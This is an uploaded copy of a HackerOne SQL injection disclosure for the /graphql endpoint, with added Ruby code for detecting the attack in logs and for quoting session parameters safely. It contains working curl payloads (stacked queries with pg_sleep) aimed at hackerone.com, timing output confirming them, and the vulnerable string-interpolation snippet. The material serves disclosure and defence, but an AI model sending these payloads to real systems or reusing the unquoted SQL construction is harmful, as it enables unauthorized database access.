Uploaded by

riapoul8

SQL Injection in GraphQL Endpoint

Bug: 🐞 SQL Injection
Severity: Critical (10.0)
Asset: ☑️ GraphQL
🎉 Bounty Award: None
Reported: 👋🏻 Jobert Abma (jobert)

Vulnerability Description:
The embedded_submission_form_uuid parameter in the /graphql endpoint is
vulnerable to SQL injection. By manipulating this parameter, an attacker can
inject arbitrary SQL queries, potentially leading to unauthorized access or data
leakage.

Proof of Concept:
To reproduce the vulnerability, execute the following command with the manipulated
embedded_submission_form_uuid parameter:

Locally:

  curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27

HackerOne.com:

  curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27



Additional Proof:

  $ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(5\)%3B--%27
  {}curl -X POST  0.03s user 0.01s system 0% cpu 5.726 total
  $ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(1\)%3B--%27
  {}curl -X POST  0.03s user 0.01s system 2% cpu 1.631 total
  $ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(10\)%3B--%27
  {}curl -X POST  0.02s user 0.01s system 0% cpu 10.557 total

The wall-clock total tracks the pg_sleep() argument (5, 1 and 10 seconds), which
confirms that the injected statement is executed by the database.
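The timing evidence above is also what a responder looks for in server logs after a report like this. The following Ruby (the language of the vulnerable code) is an added example and not part of the report: it scans constructed access-log lines for the /graphql endpoint, URL-decodes the query string, and flags parameter values that do not look like a UUID, that carry statement separators or pg_sleep, and, as corroboration only, that took unusually long to serve. The log layout, the SLOW_SECONDS threshold, the client addresses and the benign UUID are constructed assumptions; the encoded value on the second line is the one from the report.

```ruby
require 'uri'

# Constructed access-log lines: common-log fields plus the request time in
# seconds as the last field. Line 2 carries the URL-encoded value from the
# report; lines 1 and 3 are ordinary traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [10/Oct/2018:12:00:01 +0000] "POST /graphql?embedded_submission_form_uuid=9f1c2e4a-0000-4000-8000-000000000001 HTTP/1.1" 200 0.042
  203.0.113.7 - - [10/Oct/2018:12:00:05 +0000] "POST /graphql?embedded_submission_form_uuid=1%27%3BSELECT%201%3BSELECT%20pg_sleep(5)%3B--%27 HTTP/1.1" 200 5.726
  203.0.113.9 - - [10/Oct/2018:12:00:09 +0000] "GET /graphql?query=%7Bme%7Bid%7D%7D HTTP/1.1" 200 0.030
LOG

LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>\S+) (?<target>\S+) [^"]*" (?<status>\d{3}) (?<secs>[\d.]+)\z/
UUID = /\A[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\z/i
# Statement separators followed by a new SELECT, pg_sleep, or a SQL comment
# have no business inside a form UUID.
SQL_INDICATORS = /pg_sleep|;\s*select\b|--/i
SLOW_SECONDS = 3.0 # assumed threshold; tune to the endpoint's normal latency

# Returns one finding per suspicious parameter: which client sent it, when,
# the decoded value, and the reasons it was flagged.
def suspicious_requests(log_text)
  findings = []
  log_text.each_line(chomp: true) do |line|
    next unless (m = LOG_LINE.match(line))
    path, _, query = m[:target].partition('?')
    next unless path == '/graphql' && !query.empty?
    URI.decode_www_form(query).each do |name, value|
      reasons = []
      reasons << :not_a_uuid if name.end_with?('_uuid') && value !~ UUID
      reasons << :sql_metacharacters if value =~ SQL_INDICATORS
      # Latency alone is a weak signal; only record it alongside another reason.
      reasons << :slow_response if !reasons.empty? && m[:secs].to_f >= SLOW_SECONDS
      next if reasons.empty?
      findings << { ip: m[:ip], time: m[:time], param: name, value: value, reasons: reasons }
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  suspicious_requests(SAMPLE_LOG).each { |f| puts f.inspect }
end
```

Running the file prints one finding, for the second line, with all three reasons; the UUID-shaped value on the first line and the ordinary GraphQL query on the third produce nothing.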

Impact:
The SQL injection appears to execute within the context of the secure schema.
While the full impact is currently unknown, given the ability for an attacker to
potentially switch schemas, it should be considered as having a high impact on
confidentiality.

Impacted Data:
No exploitation of the vulnerability has been detected. Further details can be
found in the report below.

Root Cause:
The vulnerability stems from the decision to use GraphQL parameters, which
were not properly sanitized, instead of input fields when introducing the
embedded submission form feature. Below is a snippet of the vulnerable code:

  unless database_parameters_up_to_date
    safe_query = ''

    new_parameters.each do |key, value|
      # key and value are interpolated into the statement text without quoting
      safe_query += "SET SESSION #{key} TO #{value};" # <-- 😮
    end

    begin
      connection.query(safe_query)
    rescue ActiveRecord::StatementInvalid => e
      # NOTE: when the transaction is aborted, we cannot set or reset any parameters.
      # Changes of previous SET statements are undone as well, so we can safely do
      # nothing here
      raise e unless e.cause.is_a? PG::InFailedSqlTransaction
    end
  end

The usage of parameters in PostgreSQL queries is necessitated by the
database having two separate schemas: the public schema and the secure
schema. GraphQL queries default to the secure schema, which returns data
based on user authorization. Despite this, the vulnerability poses a risk to
confidentiality.
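To make the root cause concrete, the following Ruby is an added example, not the report's or HackerOne's code. It places the report's construction (key and value spliced into "SET SESSION ... TO ...") next to a builder that checks the parameter name against an allowlist and quotes the value as a SQL string literal, and it includes a small scanner that counts top-level statements in the built SQL so the difference can be measured. ALLOWED_PARAMETERS, the quote_literal stand-in for ActiveRecord's connection.quote, and the assumption that the caller had wrapped the UUID in single quotes before it reached the builder are all assumptions made for this illustration; nothing here connects to a database.

```ruby
# Same construction as the snippet in the report: key and value go into the
# statement text unchanged.
def build_session_sql_vulnerable(new_parameters)
  sql = ''
  new_parameters.each do |key, value|
    sql += "SET SESSION #{key} TO #{value};"
  end
  sql
end

# Minimal stand-in for ActiveRecord's connection.quote: a single-quoted SQL
# string literal with embedded quotes doubled. NUL bytes are rejected because
# PostgreSQL text cannot contain them. With standard_conforming_strings on
# (the PostgreSQL default) backslashes need no escaping.
def quote_literal(value)
  s = value.to_s
  raise ArgumentError, 'NUL byte in SQL literal' if s.include?("\0")
  "'" + s.gsub("'", "''") + "'"
end

class UnsafeParameterName < ArgumentError; end

# Assumed allowlist of settings the application is supposed to change per
# session. Identifiers cannot be quoted like values or bound as query
# parameters, so the name is validated against a fixed list instead.
ALLOWED_PARAMETERS = %w[search_path statement_timeout].freeze

def build_session_sql_safe(new_parameters)
  new_parameters.map do |key, value|
    name = key.to_s
    raise UnsafeParameterName, name unless ALLOWED_PARAMETERS.include?(name)
    "SET SESSION #{name} TO #{quote_literal(value)};"
  end.join
end

# Counts ';' outside single-quoted strings and '--' comments. A built string
# that should be one SET statement but scores higher has been split by its
# input, which is exactly the defect in the report.
def top_level_statement_count(sql)
  count = 0
  in_string = false
  i = 0
  while i < sql.length
    c = sql[i]
    if in_string
      in_string = false if c == "'" # a doubled '' toggles twice and stays inside
    elsif c == "'"
      in_string = true
    elsif c == '-' && sql[i + 1] == '-'
      nl = sql.index("\n", i)
      break if nl.nil? # comment runs to the end of the input
      i = nl
    elsif c == ';'
      count += 1
    end
    i += 1
  end
  count
end

# The report's payload, URL-decoded, as it would reach the builder if the
# caller had already wrapped the UUID in single quotes (an assumption; the
# snippet in the report shows no quoting of its own).
SAMPLE_VALUE = "'1';SELECT 1;SELECT pg_sleep(30);--'"

if __FILE__ == $PROGRAM_NAME
  vulnerable = build_session_sql_vulnerable('search_path' => SAMPLE_VALUE)
  safe = build_session_sql_safe('search_path' => SAMPLE_VALUE)
  puts vulnerable, top_level_statement_count(vulnerable) # 3 statements
  puts safe, top_level_statement_count(safe)             # 1 statement
end
```

With the sample value the report's construction yields three top-level statements (the SET, "SELECT 1" and the pg_sleep call), while the quoted form yields a single SET whose value is one string literal containing the whole payload; a name outside the allowlist is rejected before any SQL is built. In a real Rails code base, ActiveRecord::Base.connection.quote replaces quote_literal, and the allowlist should be whatever settings the application actually needs to change.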

Recommendations:

- Immediately patch the vulnerability by implementing proper parameter
  sanitation in GraphQL queries.

- Conduct a thorough security review to identify and address any similar
  vulnerabilities in the system.

- Consider restricting access to sensitive endpoints or implementing
  additional authentication measures to mitigate potential risks.

Reference:
https://hackerone.com/reports/435066
